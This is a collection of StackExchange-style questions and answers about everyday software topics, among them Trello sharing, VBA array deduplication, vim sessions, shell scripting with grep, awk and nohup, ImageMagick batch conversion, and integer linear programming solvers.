_webapps.44166 | We use Trello as a kanban board to manage the work of multiple customer projects within our scrum team. I would like to be able to give each customer access to the board, but they should only be allowed to see the cards for their projects. How can I do this? | Configure Trello to share subset of cards on a board to certain users | trello;trello organization;trello cards | null |
_softwareengineering.55679 | I am a true believer in Model Driven Development; I think it has the potential to increase productivity, quality and predictability. When looking at MetaEdit, the results are amazing. Mendix in the Netherlands is growing very, very fast and has great results.

I also know there are a lot of problems:

- versioning of generators, templates and frameworks
- projects that just aren't right for model driven development (not enough repetition)
- higher risks (when the first project fails, you have fewer results than you would have with more traditional development)
- etc.

But still, these problems seem solvable, and the benefits should outweigh the effort needed.

Question: What do you see as the biggest problems that make you not even consider model driven development?

I want to use these answers not just for my own understanding but also as a possible source for a series of internal articles I plan to write. | Why aren't we all doing model driven development yet? | development methodologies;mdd | There is no golden hammer. What works well in one domain is pretty useless in another. There is some inherent complexity in software development, and no magic tool will remove it.

One might also argue that the generation of code is only useful if the language itself (or the framework) is not high-level enough to allow for powerful abstractions that would make MDD relatively pointless.
_webapps.80595 | I have two contacts that changed their email addresses. In order to have the correct email address pop up automatically, I deleted the first contact, but before deleting the second, I wondered: once a contact is deleted, does that delete all previous emails from that contact? | Does deleting an email contact delete the previous emails from that contact? | gmail | null
_codereview.127891 | If I have an array of numbers like this:1 3 4 6 71 22 4 5 95 71 2 3 5 Is there a quick way to take all of the unique numbers and arrange them into a single column, like this?12345679The approach I have works, but takes a very long time for large matrix:Sub Test1Call RecordArrangeCall RemoveDuplicates2End SubPrivate Sub RecordArrange()Worksheets(List).ActivateDim Rng As RangeDim i As Longi = 1Application.ScreenUpdating = FalseApplication.EnableEvents = FalseApplication.Calculation = xlManualApplication.DisplayStatusBar = FalseApplication.EnableEvents = FalseDim lastRow As LonglastRow = Range(A1).End(xlDown).rowWhile i <= lastRowSet Rng = Range(A & i)If IsEmpty(Rng.Offset(0, 1).Value) = False ThenRng.Offset(0, 1).CopyRng.Offset(1, 0).Insert Shift:=xlDownRng.Offset(0, 1).Delete Shift:=xlToLeftElse: i = i + 1End IfWendColumns(A:A).Select ActiveWorkbook.Worksheets(List).Sort.SortFields.Clear ActiveWorkbook.Worksheets(List).Sort.SortFields.Add Key:=Range(A1), _ SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal With ActiveWorkbook.Worksheets(List).Sort .SetRange Range(A1:A8000) .Header = xlNo .MatchCase = False .Orientation = xlTopToBottom .SortMethod = xlPinYin .Apply End With Application.EnableEvents = TrueApplication.Calculation = xlAutomaticApplication.DisplayStatusBar = TrueApplication.EnableEvents = TrueEnd SubPrivate Sub RemoveDuplicates2()Dim Rng As RangeDim i As Longi = 1Application.ScreenUpdating = FalseApplication.EnableEvents = FalseApplication.Calculation = xlManualApplication.DisplayStatusBar = FalseApplication.EnableEvents = FalseDim lastRow As LonglastRow = Range(A1).End(xlDown).rowWhile i <= lastRowSet Rng = Range(A & i)If Rng = Rng.Offset(1, 0) And IsEmpty(Rng.Value) = False ThenRng.Delete Shift:=xlUpElseIf Rng <> Rng.Offset(1, 0) And IsEmpty(Rng.Value) = False Theni = i + 1ElseIf Application.WorksheetFunction.CountA(Rng) = 0 Theni = i + 1Else: i = i + 1End IfWend Application.EnableEvents = 
TrueApplication.Calculation = xlAutomaticApplication.DisplayStatusBar = TrueApplication.EnableEvents = TrueEnd SubThis does work, but it seems like a very roundabout approach. Is there a better way? | Re-arranging an matrix of numbers to a numeric list | vba;excel | If you want a list of unique members of a matrix (or 2 dimensional array), one good option is to use a dictionary (vba's hashtable/hashmap). Since vba is lacking a 'set' data structure, a dictionary will do the job just fine.if you have a 2 dimensional array (or matrix), you can just do a for each on that array.For Each member in matrix someDictionary(member) = TrueNextI am setting the value of the dictionary to True but I could just as well set it to anything (we don't care about the value in this case). What we do care about is the key. After doing this, you will have filled the dictionary with just the unique list of items in the matrix.After this loop you can just call someDictionary.Keys to get an array of the unique items. You can then sort that array however you like.*note that to use Dictionaries you will have to add a Reference to the Scripting library.--so for example:Private Sub RemoveDuplicates2() Dim Rng As Variant: Rng = ActiveSheet.UsedRange Dim cell as Variant Dim output as New Dictionary For Each cell in Rng output(cell) = True Next Dim uniques as Variant: uniques = output.Keys ' Do something with your array of uniques here ' perhaps drop to the worksheet like this ActiveSheet.Range(Cells(1,1), Cells(1,UBound(uniques)+1)) = uniquesEnd Sub |
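For comparison, a language with a built-in set type makes the whole exercise a one-liner; the Dictionary's Keys collection in the answer above is emulating exactly this behaviour (sketched in Python):

```python
def unique_sorted(matrix):
    # Flatten a 2-D iterable, dedupe via a set comprehension, and sort --
    # the role played by the VBA Dictionary's Keys collection above.
    return sorted({value for row in matrix for value in row})
```

Called on the grid from the question, `unique_sorted([[1, 3, 4, 6, 7], [1, 2], [2, 4, 5, 9], [5, 7], [1, 2, 3, 5]])` yields the single deduplicated column `[1, 2, 3, 4, 5, 6, 7, 9]`.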
_webmaster.101621 | I'm using Google Tag Manager to add Google Analytics.As the title suggests, do I need to Enable Enhanced Ecommerce Features for all pages, or should I create a tag that is triggered on actual ecommerce pages and enable it there. | Does the Enhanced Ecommerce data layer need to be sent on non-ecommerce pages | google analytics;google tag manager | No, the EE dataLayer does not need to be on all pages. Assuming your page view tag is enabled to track EE data via the dataLayer, it will only track whatever you push to it, so no EE data pushed means no EE data in GA. |
_codereview.91203 | My friend and I are working on a bare-bones chat web app, using Angular on the front end. He's using Swampdragon for some of the real-time stuff.My task that I set out to achieve was to get the chat window to scroll to the bottom when a chat room is loaded (most relevant bit is $dragon.onChannelMessage):app.controller('ChatRoomCtrl', ['$scope', '$dragon', 'ChatStatus', 'Users', function ( $scope, $dragon, ChatStatus, Users) { $scope.channel = 'messages'; $scope.ChatStatus = ChatStatus; $scope.idToUser = function(id) { var user; user = $scope.users.filter(function(obj) { return obj.pk == id; }); return user[0].display_name; }; Users.getList().then(function(users) { $scope.users = users; }); $dragon.onReady(function() { $dragon.subscribe('messages', $scope.channel).then(function(response) { $scope.dataMapper = new DataMapper(response.data); }); }); $dragon.onChannelMessage(function(channels, message) { if (indexOf.call(channels, $scope.channel) > -1) { if (ChatStatus.messages[message.data.room].indexOf(message.data) == -1) { message.data.posted = new Date(message.data.posted); $scope.$apply(function() { ChatStatus.messages[message.data.room].push(message.data); setTimeout(function() { scrollToBottom(); }, 30); }); } } });}]);Or, when a new message is pushed:app.controller('RoomCtrl', ['$scope', 'Rooms', 'Messages', 'ChatStatus', function($scope, Rooms, Messages, ChatStatus) { $scope.changeRoom = function(room) { ChatStatus.selectedRoom = room; Messages.getList({'room': room.id}).then(function(messages) { angular.forEach(messages, function(message, key) { message.posted = new Date(message.posted); }); ChatStatus.messages[room.id] = messages; setTimeout(function() { scrollToBottom(); }, 30); }); } $scope.rooms = Rooms.getList() .then(function(rooms) { ChatStatus.rooms = rooms; ChatStatus.selectedRoom = rooms[0]; $scope.rooms = rooms; })}]);In both controllers, I refer to the scrollToBottom function:function scrollToBottom() { var chatWindow = 
document.querySelector('.the-chats'); var mostRecent = chatWindow.querySelector('li:last-child'); var mostRecentDimensions = mostRecent.getBoundingClientRect(); var chatWindowScrollY = chatWindow.scrollTop; chatWindow.scrollTop = mostRecentDimensions.bottom + chatWindowScrollY;}If I remove the setTimeout from the first controller, it'll scroll to what is the last item in the list before the new message is pushed, while the second controller will error out.If the setTimeout is in place, this does what I want it to do. However, it feels like a bad solution; it certainly doesn't feel like an 'Angular' way.I've read a bit about promises, deferred objects, $q, etc., but the examples always seem to use it in the context of AJAX-types of calls, so I don't know if that applies here. But that's really what I'm looking for, right? Push the new message, then do the scroll? | Using setTimeout to get scrolling chat window to work, but doesn't feel like the ideal solution | javascript;angular.js;chat | null |
_unix.158329 | Unable to launch Firefox in CentOS 6. Installed package using yum install firefox.It repeatedly shows this error,XPCOMGlueLoad error for file /usr/lib/firefox/libxul.so:libvpx.so.1: cannot open shared object file: No such file or directoryCouldn't load XPCOM.How to rectify this error? | Unable to launch Firefox: keeps on crashing | libraries;firefox | null |
_vi.4817 | Is there a way to run vim from command line to edit the last edited file?Let say I first edit file giorgio.sh:$ vi giorgio.shAfterwards, I exit back to terminal$ do something...$ do something else...$ do something else again...Is there a way to edit again the file in vim, maybe using some vim command line parameter/option ?$ vi {option to edit last edited/saved file}I mean without using:an internal vim command like :browse oldfilesthe beautiful MRU pluginthe bash history (requiring to scroll, if, after your edit, you ran some other commands)It is strange that it doesn't seem possible to do a so common task in a super quick Vim way. | Is there a vim command line option to edit last edited file? | invocation;options | An heavy solution: the sessionsAnother possible option is to use the sessions mechanism:First your vim version has to be compiled with the +mksession option. (Use :echo has('mksession') to check that).Now when you are about to leave vim, use the following command::mksession!This will create (or overwrite thanks to !) a file named Session.vim in the current directory which will save your current open files, windows layout and cursor position.Note that you can also give a path as parameter to mksession to choose where to save and how to name you session file.Then you can go back to your shell and do whatever you want. When you want to reopen vim with your last edited file you have to use:$vim -S /path/to/Session.vimThis will reopen the files you where editing with the cursor at the same positionHow to shorten it? If this workflow is good for you you'll probably be able to create the bash alias the most convenient for your use case. Here is an example, maybe you'll want to bend it to your way to use sessions: You can add this to your .vimrc:command! Q mksession! 
~/Session.vim <bar> qallthis will allow you to use :Q to save your session in ~/Session.vim and quit vim. (Inside a :command definition a bare | would terminate the :command itself, so the separator has to be written as <bar>.)As a bash alias you can create :alias lvim='vim -S ~/Session.vim'which will reload the session created when you used :Q in vim.A much lighter solution: suspend vimThis solution is not suitable if you need to close your shell.In a unix shell you can suspend Vim using Ctrl+z. This will put Vim in the background and you'll get access to your shell again.In your shell when you need to get Vim back you simply have to use the command:$ fg Note that zsh provides convenient mappings to use also Ctrl+z on the shell to get Vim back.Note2 If you tend to forget that you put vim in the background you can add these lines to your .bashrc:PROMPT_COMMAND='hasjobs=$(jobs -p)'PS1=$PS1'${hasjobs:+\j }'When you don't have any background job your prompt will stay the same and when you have some background jobs, a count will appear at the end of your prompt (It's up to you to bend it to your preferences). For this trick, credit goes to jw013
_unix.231282 | So, how can I limit the log file size, or how can I automate deleting the files once they reach a particular size? Here is the actual scenario PLEASE CHECK HERE. For testing, I deleted the log file /root/folder/my_output_file.log while the script was running, but after deletion the log file was not regenerated. Or do I have to make any modifications to the script to log the output properly?Thanks | How to limit the size of log files which are generated by scripts run at startup | shell script;logs | I found some useful code (even though it is not an efficient way to handle the log files)#!/bin/bash MaxFileSize=10000000#Max file size 10MBwhile truedo python /root/rtt/rtt.py >> /root/script_logs/rtt.log sleep 60 com=`du -b /root/script_logs/rtt.log` file_size=`echo $com | cut -d' ' -f1` if [[ $file_size -gt $MaxFileSize ]] then echo ' ' > /root/script_logs/rtt.log fidone
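If the logging is moved into the Python program itself, the standard library can handle size-based rotation without any wrapper loop; a sketch (the file name and size limits are illustrative, not taken from the question):

```python
import logging
import logging.handlers

def make_rotating_logger(path, max_bytes=10_000_000, backups=3):
    # Roll the file over once a write would push it past max_bytes,
    # keeping up to `backups` old files (path.1, path.2, ...).
    handler = logging.handlers.RotatingFileHandler(
        path, maxBytes=max_bytes, backupCount=backups)
    handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
    logger = logging.getLogger("rtt")
    logger.setLevel(logging.INFO)
    logger.addHandler(handler)
    return logger
```

Unlike the `echo ' ' > file` truncation above, rotation preserves the most recent history in the numbered backup files instead of discarding it.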
_unix.283837 | I have a simple python file which plays a sound:#sound_test.pyimport pygame#init soundspygame.mixer.pre_init(44100, 16, 2, 4096)pygame.init()pygame.mixer.init()WAV = pygame.mixer.Sound(Music/4AM_cry.wav)WAV.play()EDIT: I've found that if I run alsamixer it shows the correct audio out but sudo alsamixer does not.If I run python3 soundtest.py it works but sudo python3 soundtest.py does not. What's going on?P.S. I have a USB DAC I'm using on a RPi. It is set to the default audio card. | Default audio (Pygame.mixer and alsamixer) doesn't work when using sudo | sudo | null |
_cs.66486 | Background: I am a complete layman in computer science.I was reading about Busy Beaver numbers here, and I found the following passage:Humanity may never know the value of BB(6) for certain, let alone that of BB(7) or any higher number in the sequence.Indeed, already the top five and six-rule contenders elude us: we cant explain how they work in human terms. If creativity imbues their design, its not because humans put it there. One way to understand this is that even small Turing machines can encode profound mathematical problems. Take Goldbachs conjecture, that every even number 4 or higher is a sum of two prime numbers: 10=7+3, 18=13+5. The conjecture has resisted proof since 1742. Yet we could design a Turing machine with, oh, lets say 100 rules, that tests each even number to see whether its a sum of two primes, and halts when and if it finds a counterexample to the conjecture. Then knowing BB(100), we could in principle run this machine for BB(100) steps, decide whether it halts, and thereby resolve Goldbachs conjecture. Aaronson, Scott. Who Can Name the Bigger Number? Who Can Name the Bigger Number? N.p., n.d. Web. 25 Nov. 2016.It seems to me like the author is suggesting that we can prove or disprove the Goldbach Conjecture, a statement about infinitely many numbers, in a finite number of calculations. Am I missing somehing? | Goldbach Conjecture and Busy Beaver numbers? | turing machines;number theory;busy beaver | null |
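The hypothetical machine in the passage — loop over even numbers, halt on a counterexample — is easy to sketch in ordinary code (this is an illustration of the idea, not the 100-rule Turing machine itself; the search is bounded by `limit` only so that it terminates):

```python
def is_prime(n):
    # Trial division; slow but obviously correct.
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True

def goldbach_counterexample(limit):
    # Return the first even number >= 4 that is NOT a sum of two
    # primes, or None if none exists up to `limit`.  The machine in
    # the essay is this loop with limit removed: it halts iff the
    # Goldbach conjecture is false.
    for n in range(4, limit + 1, 2):
        if not any(is_prime(p) and is_prime(n - p) for p in range(2, n // 2 + 1)):
            return n
    return None
```

Knowing BB(100) would bound how long the unbounded version of this loop can run before we may conclude it never halts — which is exactly the resolution of the conjecture the passage describes.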
_unix.308370 | (I'm editing an existing Bash script, so I'm probably making a silly mistake here...)I have a shell script that saves a command with an environment variable as its argument like this:COMMAND=mvn clean install -P $MAVEN_PROFILEIt then executes the command with nohup roughly as follows:nohup $COMMAND > logfileThis works.Now, I want to set an environment variable that can be accessed in Maven. I've tried several things like the following:COMMAND=FORMAVEN=valueForMaven mvn clean install -P $MAVEN_PROFILE...but then it just terminates with:nohup: failed to run command `FORMAVEN=valueForMaven': No such file or directoryI feel like there are several unrelated concepts at work here, none of which I understand or even know about. What do I need to be able to do the above? | How can I set environment variables for a program executed using `nohup`? | bash;shell script;environment variables;nohup;subshell | Three methods:set (and export) the variable before launching mvnset the variable on the nohup launch:FORMAVEN=valueForMaven nohup $COMMAND > logfileuse env to set the variableCOMMAND=env FORMAVEN=valueForMaven mvn clean install -P $MAVEN_PROFILE |
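The same principle — construct the child process's environment explicitly rather than hoping the shell re-splits `VAR=value command` out of a string — is visible in Python's subprocess module; a sketch (the FORMAVEN name is borrowed from the question):

```python
import os
import subprocess

def run_with_env(cmd, extra_env):
    # Merge extra variables into a copy of the current environment,
    # mirroring `env FORMAVEN=value command` in the shell.
    env = dict(os.environ, **extra_env)
    return subprocess.run(cmd, env=env, capture_output=True, text=True)
```

The child sees FORMAVEN exactly as Maven would, without any word-splitting pitfalls.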
_scicomp.2441 | I am implementing a machine learning algorithm for which I need to solve an integer linear program. To get the solution in polynomial time, the authors of the algorithm have dropped the integral constraints and instead solve the corresponding linear program.I am not too aware of the theory of optimization, so I am using the Mosek optimization tool-kit as a black-box to solve the LP. Now obviously I have to add back the integral constraints once the solution of the LP is obtained. Any ideas how to go about it? I am sure Mosek and other popular LP solvers would have an option for the same but I can't seem to find it in their documentation or elsewhere.Thanks. | How to add back integral constraints to linear program solution | optimization;linear programming | A lot of linear programming (LP) software packages will also solve mixed-integer linear programs (MILPs) with varying degrees of effectiveness.One way to add back the integral constraints is to warm-start an MILP solver with the solution from the LP relaxation of the integer linear program (ILP) that the authors of the machine learning algorithm use. However, Ali is right that it would be more efficient to solve the original ILP. Certain algorithms (such as branch-and-bound) will solve the LP relaxation in the process of computing an optimal solution.Furthermore, any MILP solver worth using will implement MILP solution algorithms, such as branch-and-bound and branch-and-cut, with much more sophisticated algorithmic heuristics and variants than most people could code themselves. Even in problems with special structure, researchers often modify and tweak existing solvers rather than write their own.If you're at a university, I highly suggest using CPLEX or Gurobi, both of which are top-of-the-line MILP solvers that have free academic licenses. In some cases, these solvers will solve MILP instances significantly faster than their competition. 
That said, if your problem is small enough, speed may not really matter. |
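For very small instances, any relaxation-plus-rounding scheme can be sanity-checked against exact brute-force enumeration of the binary variables; a toy sketch with made-up data:

```python
from itertools import product

def brute_force_ilp(c, A, b):
    # Maximize c.x subject to A.x <= b with x binary.
    # Exponential in len(c), so only viable for a handful of
    # variables -- but exact, which makes it a useful oracle when
    # validating a rounded LP-relaxation solution.
    best_x, best_val = None, float("-inf")
    for x in product((0, 1), repeat=len(c)):
        feasible = all(
            sum(a_i * x_i for a_i, x_i in zip(row, x)) <= rhs
            for row, rhs in zip(A, b))
        if feasible:
            val = sum(c_i * x_i for c_i, x_i in zip(c, x))
            if val > best_val:
                best_x, best_val = x, val
    return best_x, best_val
```

For a tiny knapsack — maximize 5x1 + 4x2 + 3x3 subject to 6x1 + 4x2 + 3x3 <= 10 — the exact optimum is x = (1, 1, 0) with value 9, which a naive rounding of the fractional LP optimum would not necessarily find.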
_webapps.84667 | I created a one page flow-chart with draw.io and printed it. After opening it again to create a new version, it opened to what I thought was a blank page. There was now page after page of blank canvas, with the project in the lower right corner.I tried to go to Document Properties Custom but that didn't remove the blank pages. There is no obvious way to remove them. The structure chart content is neatly within the one page, so I don't see why it would automatically add more. The main problem is that I can't print or save because the file is so large my laptop freezes or otherwise stalls when trying to print or save as a pdf.How can I remove these blank pages? | How to remove blank canvas pages from draw.io | draw.io | null |
_softwareengineering.90859 | We are currently usign a roll-forward approach to DB changes, akin to Migrations, where each developer creates and checks in a script that promotes the latest version of the DB to a new state. Problems arise when multiple developers concurrently work on non-trivial tasks and end up making changes to the DB that interfere with each other. The 'non-trivial' bit is significant because if the tasks take long enough, and if DB changes occurr early enough in the cycle, neither dev ends up being aware of the other's changes, and we end up with either a DB merge nightmare (preferred case) or an inadvertently broken database.Can these situations be easily avoided? Are there database refactoring strategies that effectively handle the scenario of multiple developers actively changing the schema?If it matters, we use SQL Server. | How best to handle database refactoring within a team? | database;refactoring;sql server | null |
_scicomp.7001 | I am trying to solve some unconstrained nonlinear optimization problems on GPU (CUDA).The objective function is a smooth nonlinear function, and its gradient is relatively cheap to compute analytically, so I don't need to bother with numerical approximation.I want to solve this problem with mostly fp32 maths ops (for various reasons), so which nonlinear optimization method is more robust against round-off errors while still having good performance? (e.g. conjugate gradient/quasi-Newton/trust region), has anyone tried BFGS on GPU with good results?btw, the Hessian, if needed, is relatively small in my case (<64x64 typically), but I need to solve thousands of these small-scale optimization problems concurrently. | Solving unconstrained nonlinear optimization problems on GPU | optimization;cuda | null
_codereview.91402 | Our school grading scale is from 1..10 with one decimal. If you do nothing you still get a grade of 1.0. A passing grade equals 5.5. A 'cesuur' percentage defines at what percentage of correct answers the 5.5 will be given to a student.Examples:Grade(0,100,x) should always result in 1.0Grade(100,100,x) should always result in 10.0Grade(50,100,0.5) should result in 5.5Questions: how can I simplify the code? How can I make it more robust?Public Function Grade(Points As Integer, MaxPoints As Integer, Cesuur As Double) As Double Dim passPoints As Integer Dim maxGrade As Integer Dim minGrade As Integer Dim passGrade As Double Dim base As Double Dim restPoints As Integer Dim restPass As Double passPoints = Cesuur * MaxPoints maxGrade = 10 minGrade = 1 passGrade = (maxGrade + minGrade) / 2 base = maxGrade - passGrade If Points < passPoints Then Grade = 1 + (passGrade - minGrade) * Points / passPoints Else restPoints = MaxPoints - Points restPass = MaxPoints * (1 - Cesuur) Grade = maxGrade - restPoints * base / restPass End If Grade = Round(Grade, 1)End Function | Calculate grades based on pass/fail percentage | vba | The function's parameters are implicitly passed by reference, which probably isn't the intent since none of the parameters are assigned/returned to the caller.Signature should pass its parameters by value, like this:Public Function Grade(ByVal Points As Integer, ByVal MaxPoints As Integer, ByVal Cesuur As Double) As DoublemaxGrade and minGrade are only ever assigned once - they're essentially constants and could be declared as such:Const MAXGRADE As Integer = 10Const MINGRADE As Integer = 1I would suggest declaring variables closer to their usage, and perhaps only assigning the function's return value in one place.Variables restPoints and restPass are only ever used with a passing grade, in that Else block. 
VBA doesn't scope variables at anything tighter than procedure scope, so you could extract a method to calculate a passing grade, but that's borderline overkill - here's what it would look like, with parameter casing to camelCase:Option ExplicitPrivate Const MAXGRADE As Integer = 10Private Const MINGRADE As Integer = 1Public Function Grade(ByVal points As Integer, ByVal maxPoints As Integer, ByVal cesuur As Double) As Double Dim passPoints As Integer passPoints = cesuur * maxPoints Dim passGrade As Double passGrade = (MAXGRADE + MINGRADE) / 2 Dim base As Double base = MAXGRADE - passGrade Dim result As Double If points < passPoints Then result = 1 + (passGrade - MINGRADE) * points / passPoints Else result = CalculatePassingGrade(base, points, maxPoints, cesuur) End If Grade = Round(result, 1)End FunctionPrivate Function CalculatePassingGrade(ByVal base As Double, ByVal points As Integer, ByVal maxPoints As Integer, ByVal cesuur As Double) As Double Dim restPoints As Integer restPoints = maxPoints - points Dim restPass As Double restPass = maxPoints * (1 - cesuur) CalculatePassingGrade = MAXGRADE - restPoints * base / restPassEnd Function
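A direct Python port of the same formula makes the question's three invariants easy to test mechanically (my translation; it assumes 0 < cesuur < 1 so that neither branch divides by zero):

```python
MAX_GRADE = 10
MIN_GRADE = 1

def grade(points, max_points, cesuur):
    # Piecewise-linear scale: linear from 1.0 up to the pass mark,
    # then linear from the pass mark up to 10.0.  The pass mark
    # (cesuur * max_points correct answers) maps to 5.5.
    pass_points = cesuur * max_points
    pass_grade = (MAX_GRADE + MIN_GRADE) / 2   # 5.5
    base = MAX_GRADE - pass_grade              # 4.5
    if points < pass_points:
        result = MIN_GRADE + (pass_grade - MIN_GRADE) * points / pass_points
    else:
        rest_points = max_points - points
        rest_pass = max_points * (1 - cesuur)
        result = MAX_GRADE - rest_points * base / rest_pass
    return round(result, 1)
```

Checking the examples from the question: `grade(0, 100, 0.5)` gives 1.0, `grade(100, 100, 0.5)` gives 10.0, and `grade(50, 100, 0.5)` gives 5.5. (Note that Python's `round` uses banker's rounding, which can differ from VBA's `Round` on exact .x5 halves.)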
_unix.339093 | I have some Pictures that I want in black and white.I'm in the right folder. -rw-r--r-- 1 alex alex 1027 Jan 21 13:07 target-0.jpg-rw-r--r-- 1 alex alex 1001 Jan 21 12:17 target-1.jpg-rw-r--r-- 1 alex alex 957 Jan 21 12:17 target-2.jpg-rw-r--r-- 1 alex alex 982 Jan 21 12:17 target-4.jpgWhy does this not work? for i in *.jpg ; do mogrify -monochrome ; doneNo errors, but no black and white Pictures. When I convert a single one with mogrify -monochrome target-0.jpg it works as expected. Version of imagemagickapt-cache policy imagemagickimagemagick: Installed: 8:6.8.9.9-5+deb8u6 Installation candidate: 8:6.8.9.9-5+deb8u6 Version table: *** 8:6.8.9.9-5+deb8u6 0 500 http://security.debian.org/ jessie/updates/main amd64 Packages 500 http://http.us.debian.org/debian/ jessie/main amd64 Packages 100 /var/lib/dpkg/statusAnd env | grep -i shellSHELL=/bin/bash | mogrify -monochrome on several Pictures | bash;command line;imagemagick;image manipulation | You do not pass the variable i to your mogrify command in the for loop. It should be as follows.for i in *.jpg ; do mogrify -monochrome $i; done
_unix.4840 | I run the following command:grep -o [0-9] errors verification_report_3.txt | awk '{print $1}'and I get the following result:1408I'd like to add each of the numbers up to a running count variable. Is there a magic one liner someone can help me build? | Adding numbers from the result of a grep | bash;shell;grep | grep -o [0-9] errors verification_report_3.txt | awk '{ SUM += $1} END { print SUM }'That doesn't print the list but does print the sum. If you want both the list and the sum, you can do:grep -o [0-9] errors verification_report_3.txt | awk '{ SUM += $1; print $1} END { print SUM }' |
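The same pipeline — pick the first number out of each matching line and keep a running total — can be sketched in Python if the logic ever outgrows a one-liner (the sample lines below are made up):

```python
import re

def sum_error_counts(lines, keyword="errors"):
    # For each line containing `keyword`, grab its first integer and
    # add it to the running total -- the role of awk's SUM += $1.
    total = 0
    for line in lines:
        if keyword in line:
            m = re.search(r"\d+", line)
            if m:
                total += int(m.group())
    return total
```

On input lines like "1 errors", "4 errors", "0 warnings", "8 errors" this returns 13, matching what the awk pipeline prints as SUM.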
_webapps.58069 | To legally reuse a CC image from Flickr, you must attribute properly the source and license, as explained on this blog: http://librarianbyday.net/2009/09/28/how-to-attribute-a-creative-commons-photo-from-flickr/ Another question about how to properly attribute was answered https://webapps.stackexchange.com/a/47595/19350Proper attribution involves many steps of linking info back to the source. The relative complexity of attribution seems to dissuade people from properly doing this (they will tend to just copy/paste the image and be done with it). Is there a tool or place on Flickr where I can copy/paste the attribution to a CC image such that I can simplify this process? I'm looking for a Copy image with attribution feature, that when you then paste, supplies all the information in various formats. Note that when I copy text from my Kindle reader on PC, the text will be pasted with a reference to the book and location (relative within). It's a smart copy/paste that sort-of does what I'm asking. Here's an example (I just selected a paragraph in the Kindle, did a copy, then pasted it here. The second part contains the attribution to the book.):Applying the Language To apply the patterns in this book to the solution of the example problem, first build a working pattern language for the project. The language will contain those elements of the fault tolerant vocabulary presented here that will be useful in the design of the system. Patterns are not included if they will clearly not be needed or useful.Hanmer, Robert (2013-07-12). Patterns for Fault Tolerant Software (Wiley Software Patterns Series) (Kindle Locations 4972-4975). Wiley. Kindle Edition. I'm looking for something similar, but with CC images on Flickr. | Is there a simple way to attribute a CC image on flickr? | images;flickr;copyright;copy paste | Imagecodr.org is mentioned in the OP's link to librarianbyday. 
Put a flickr URL and you get the following (it's possible to vary the format):<div about='http://farm3.static.flickr.com/2639/3979663993_90d928ba13_m.jpg'><a href='http://www.flickr.com/photos/umpcportal/3979663993/' target='_blank'><img xmlns:dct='http://purl.org/dc/terms/' href='http://purl.org/dc/dcmitype/StillImage' rel='dct:type' src='http://farm3.static.flickr.com/2639/3979663993_90d928ba13_m.jpg' alt='three device mobility by umpcportal.com, on Flickr' title='three device mobility by umpcportal.com, on Flickr' border='0'/></a><br/><a rel='license' href='http://creativecommons.org/licenses/by-nc-nd/2.0/' target='_blank'><img src='http://i.creativecommons.org/l/by-nc-nd/2.0/80x15.png' alt='Creative Commons Attribution-Noncommercial-No Derivative Works 2.0 Generic License' title='Creative Commons Attribution-Noncommercial-No Derivative Works 2.0 Generic License' border='0' align='left'></a> by <a href='http://www.flickr.com/people/umpcportal/' target='_blank'> </a><a xmlns:cc='http://creativecommons.org/ns#' rel='cc:attributionURL' property='cc:attributionName' href='http://www.flickr.com/people/umpcportal/' target='_blank'>umpcportal.com</a><a href='http://www.imagecodr.org/' target='_blank'> </a></div>which looks something likeNote that the name of the work displays when you hover over the image -- perhaps not the best solution. We don't see the Author's name (Steve Paine) in the metadata, although the link to umpcportal may be sufficient. |
_cs.80246 | Reversible programs with finite execution steps are well studied. For example, a Turing machine whose transitions are reversible and halts can be executed backwards consuming its tape in the reverse order. A variant of Turing machines with distinct input, output, and work tapes can be similarly executed in reverse to consume its output and regenerate its input, assuming it halted with an empty work tape in the forward execution (to avoid the possibility of stashing input information in the work tape).Is there any work on the equivalent concepts in the setting of interactive programs (in the spirit of https://en.wikipedia.org/wiki/Interactive_computation)? In the three-tape Turing machine model described, it is clearly possible to have infinite interactive runs consuming an infinite input stream and emitting an infinite output stream while storing intermediate results in the work tape. Some of these programs are clearly reversible in an analogous way to the finite programs, but cannot be covered by that formalism if they are non-halting. How can we characterize reversible interactive programs in this model? We need to exclude programs that simply stash away their input in the work tape, but unlike the finite case, we can't simply require that the program ends with an empty work tape.Is there any work on such reversible interactive programs? | How to model reversible interactive programs | turing machines;reference request;reversible computing | null
_unix.385515 | In Nginx we can return a specific status code for a URL prefix like this.location /api { return 200; }How can we achieve the same in HAProxy? I've gone through the HAProxy ACL documentation but couldn't find a way. | Return a specific/200 status code for a particular URL prefix in Haproxy | linux;webserver;haproxy | null
_unix.292607 | I am trying to understand how this piece of code works:for b in `git branch -r`; do git branch --track ${b##upstream/} $b; doneIn particular, the part where it does${b##upstream/}I know it cuts the characters upstream/ from $b, but I want to know how or why this works. I found this snippet on a forum. | for loop # usage | shell;variable | null |
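`${b##upstream/}` is shell parameter expansion: `${var##pattern}` removes the longest match of `pattern` from the front of `$var` (a single `#` removes the shortest match). Since `upstream/` contains no glob characters, longest and shortest coincide and the expansion is plain prefix stripping, which this Python sketch mirrors:

```python
def strip_prefix(s, prefix):
    # Equivalent of ${s##prefix} for a literal (glob-free) pattern:
    # drop the prefix if present, otherwise return s unchanged.
    return s[len(prefix):] if s.startswith(prefix) else s
```

So in the git loop, `strip_prefix("upstream/master", "upstream/")` yields `"master"` — the local branch name — while names without the prefix pass through untouched, just as the shell expansion leaves non-matching values of `$b` unchanged.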
_unix.194292 | I have a large directory with tons of files and subdirectories in it. Is there a way to recursively search through all of these files and subdirectories and print out a list of all files containing an underscore (_) in their file name? | Recursively list files containing an underscore in the file name | files;recursive | find . -name '*_*'Thanks to Stphane Chazelas as noted in the comments above! |
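If you later need the same search from a script rather than an interactive shell, a short Python walk gives the equivalent of `find . -name '*_*'` restricted to regular files (the underscore pattern is hard-coded here for illustration):

```python
import os

def files_with_underscore(root):
    # Walk root recursively and collect files whose *name*
    # (not the directory part) contains an underscore.
    matches = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if "_" in name:
                matches.append(os.path.join(dirpath, name))
    return matches
```

Note one difference from the bare `find` command: `find` would also report directories whose names contain an underscore, while this sketch lists files only.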
_computerscience.5443 | This link says that the iPhoneGLU library supports the features below.Matrix manipulationPolygon tessellationI would like to know whether I can use this library to draw primitives (lines, points, triangles, simple polygons).Thank you. | iPhone GLU(OpenGL Utility Library) | opengl es | null
